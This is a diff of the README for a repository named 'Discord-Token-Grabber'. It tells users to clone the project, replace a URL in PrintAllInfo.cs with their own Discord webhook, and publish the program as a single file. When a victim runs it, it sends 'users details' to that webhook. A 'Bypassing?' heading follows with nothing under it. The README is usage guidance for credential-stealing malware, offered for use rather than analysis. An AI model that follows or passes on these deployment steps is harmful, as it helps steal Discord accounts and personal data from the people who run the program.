SammieLetgo/Discord-Token-Grabber/README.md

 # How to use?
-Clone this repo and inside PrintAllInfo.cs you should see a url string, replace the url with your own discord webhook (not the double quotes) you can publish as onefile and it will send an embed containing users details.
+Clone this repo and inside PrintAllInfo.cs you should see a url string, replace the url with your own discord webhook (not the double quotes) you can publish as onefile and when ran, it will send an embed containing users details.

 # Bypassing?